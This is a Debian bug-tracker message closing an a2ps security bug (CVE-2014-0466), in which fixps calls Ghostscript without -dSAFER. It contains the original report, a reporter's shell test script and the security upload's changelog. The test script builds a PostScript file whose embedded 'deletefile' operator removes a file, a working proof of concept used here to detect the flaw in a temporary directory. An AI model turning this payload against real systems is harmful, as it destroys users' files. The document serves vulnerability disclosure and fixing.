Bug#742902: marked as done (a2ps: CVE-2014-0466: does not invoke gs with -dSAFER)

Debian Bug Tracking System Tue, 01 Apr 2014 14:22:24 -0700

Your message dated Tue, 01 Apr 2014 21:17:06 +0000
with message-id <e1wv63o-0003fu...@franck.debian.org>
and subject line Bug#742902: fixed in a2ps 1:4.14-1.1+deb7u1
has caused the Debian Bug report #742902,
regarding a2ps: CVE-2014-0466: does not invoke gs with -dSAFER
to be marked as done.


This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
742902: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=742902
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

--- Begin Message ---

Package: a2ps
Version: 1:4.14-1.2
Severity: grave
Tags: security

fixps does not invoke gs with -dSAFER.  As a consequence, a malicious
PostScript file could delete files with the privileges of the invoking
user.

I have provided a test script that can be invoked as such:

  ./test-wrapper-fixps fixps

This was reported to the Debian Security Team, who assigned this
CVE-2014-0466.  It was also reported to upstream, who has not provided
an update or issued a fixed version.  This is being reported publicly as
over 45 days has elapsed and neither upstream nor the security team has
requested a delay or issued an advisory.

-- System Information:
Debian Release: jessie/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.14-rc7-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages a2ps depends on:
ii  file       1:5.17-1
ii  libc6      2.18-4
ii  libpaper1  1.1.24+nmu2
ii  psutils    1.17.dfsg-1

Versions of packages a2ps recommends:
ii  bzip2           1.0.6-5
ii  cups-bsd [lpr]  1.7.1-10
ii  wdiff           1.2.1-2

Versions of packages a2ps suggests:
pn  emacsen-common                       <none>
ii  ghostscript                          9.05~dfsg-8+b1
ii  groff                                1.22.2-5
pn  gv                                   <none>
pn  html2ps                              <none>
ii  imagemagick                          8:6.7.7.10+dfsg-1
pn  t1-cyrillic                          <none>
ii  texlive-binaries [texlive-base-bin]  2013.20130729.30972-2+b2

-- no debconf information

-- 
brian m. carlson / brian with sandals: Houston, Texas, US
+1 832 623 2791 | http://www.crustytoothpaste.net/~bmc | My opinion only
OpenPGP: RSA v4 4096b: 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187

#!/bin/sh
# test-wrapper: test if a program is running gs without -dSAFER
#
# Usage: test-wrapper program --option --option2

TEMPDIR=`mktemp -d`

[ -n "$TEMPDIR" ] || exit 1

touch "$TEMPDIR/remove-me"
groff -Tps <<EOM | sed -e '/%%Pages/d' >"$TEMPDIR/exploit.ps"
Text
\X'ps: exec ($TEMPDIR/remove-me) deletefile'
More text.
EOM

"$@" "$TEMPDIR/exploit.ps" >/dev/null

if [ -e "$TEMPDIR/remove-me" ]
then
        printf "Program is not vulnerable.\n"
else
        printf "Program is VULNERABLE!\n"
fi
rm -r -- "$TEMPDIR"

signature.asc
Description: Digital signature

--- End Message ---

--- Begin Message ---

Source: a2ps
Source-Version: 1:4.14-1.1+deb7u1

We believe that the bug you reported is fixed in the latest version of
a2ps, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 742...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Salvatore Bonaccorso <car...@debian.org> (supplier of updated a2ps package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Sun, 30 Mar 2014 12:43:56 +0200
Source: a2ps
Binary: a2ps
Architecture: source amd64
Version: 1:4.14-1.1+deb7u1
Distribution: wheezy-security
Urgency: high
Maintainer: Masayuki Hatta (mhatta) <mha...@debian.org>
Changed-By: Salvatore Bonaccorso <car...@debian.org>
Description: 
 a2ps       - GNU a2ps - 'Anything to PostScript' converter and pretty-printer
Closes: 737385 742902
Changes: 
 a2ps (1:4.14-1.1+deb7u1) wheezy-security; urgency=high
 .
   * Non-maintainer upload by the Security Team.
   * Add 09_CVE-2001-1593.dpatch patch.
     CVE-2011-1593: Fix insecure use of /tmp
     Thanks to Jakub Wilk <jw...@debian.org> (Closes: #737385)
   * Add 10_CVE-2014-0466.dpatch patch.
     CVE-2014-0466: fixps does not invoke gs with -dSAFER. A malicious
     PostScript file could delete files with the privileges of the invoking
     user.
     Thanks to brian m. carlson <sand...@crustytoothpaste.net> (Closes: #742902)
Checksums-Sha1: 
 51a294add4a723aff8d3dd7fb0526cd707995ff1 1846 a2ps_4.14-1.1+deb7u1.dsc
 365abbbe4b7128bf70dad16d06e23c5701874852 2552507 a2ps_4.14.orig.tar.gz
 7c84421d97e746c242358b0410a5d44912fff690 30059 a2ps_4.14-1.1+deb7u1.diff.gz
 54ec39ed0ea16591d16b0ec4a82b13654b1c75fd 956298 a2ps_4.14-1.1+deb7u1_amd64.deb
Checksums-Sha256: 
 d9c245a2c56378f75842842e1e53c00a5d53ebcd5dad0bb0b15ce3055ad5b3a6 1846 
a2ps_4.14-1.1+deb7u1.dsc
 f3ae8d3d4564a41b6e2a21f237d2f2b104f48108591e8b83497500182a3ab3a4 2552507 
a2ps_4.14.orig.tar.gz
 d3e42c0a9abd326d86881be9e4693cf970cfd59a808838a79ba2105a792e8363 30059 
a2ps_4.14-1.1+deb7u1.diff.gz
 e47d7fe9adb7aa62421108debf425830f4e2385e98151c5cb359d3eb8688eea8 956298 
a2ps_4.14-1.1+deb7u1_amd64.deb
Files: 
 a7aa5a7ad06420950b945a0bca42a8bd 1846 text optional a2ps_4.14-1.1+deb7u1.dsc
 781ac3d9b213fa3e1ed0d79f986dc8c7 2552507 text optional a2ps_4.14.orig.tar.gz
 fc4b04279150786111ecd7c159f52af5 30059 text optional 
a2ps_4.14-1.1+deb7u1.diff.gz
 b557a599dafd687611119264203ef2aa 956298 text optional 
a2ps_4.14-1.1+deb7u1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJTOEHNAAoJEAVMuPMTQ89EQ1oP/A6lL3Qo3RQ/On+EZBf+Mr/J
zKVK1+5kODEi1buYttVE10iBZgPnx3JZmfnSJYphLwsSb0nzys31Vp0IpaNQcLuy
7JxQaISNk4rc7KbhjC2j2ClrFJ1UltxipyRVYkApnP7UaNrIQb3TXqRVfWkYxCMB
N/CFVhmEZzFeVlnscaEbu2aRAiW93ipD7giH2PTkBjKVFziGMIQOSVVnRUmmPLlw
U3p1hhp350CpRQdKnmqThnhckqG/IayGbRr0yOTeg9v1/7ZIi5Nn3gqKlQ5GmTcp
OcM3hH/0g8LUxiGiwzsrPrIsAULWJHHO4vQ3TFGNyYRsdpRNU6D+X7Acw1mqNUi7
hyQ9X/JQTO+G3+BAhZKR02ll4GJIBNobeWiCu5wBUWiukQGEnMPV24UyRlteCU+2
X934YWFo3Tia3sKJq323VU1E5DAZJMm5jsn1UMuOfpWew1ptOc1ri5L7YCOMBmzw
wN2QmkvGScj/x/E0zNCpSmPv3uVa9MUPa9RfplnPJmVcLtTZjv8kqXL+VF6PGZCO
B6OB21wNGsQhmmHfp6Mlaq5EiKXkPKR7zLik1uvm1mpIMycfDTUTVJct9Er2NswA
QRiLGufqHtXrRL+qrJ+CDkGrvUJVBSRa5YNXg8a2fveq7nCtoRAJotB1em2WsYjg
xyF0gv1N6dw6gbCySXon
=abrz
-----END PGP SIGNATURE-----

--- End Message ---

Bug#742902: marked as done (a2ps: CVE-2014-0466: does not invoke gs with -dSAFER)

Reply via email to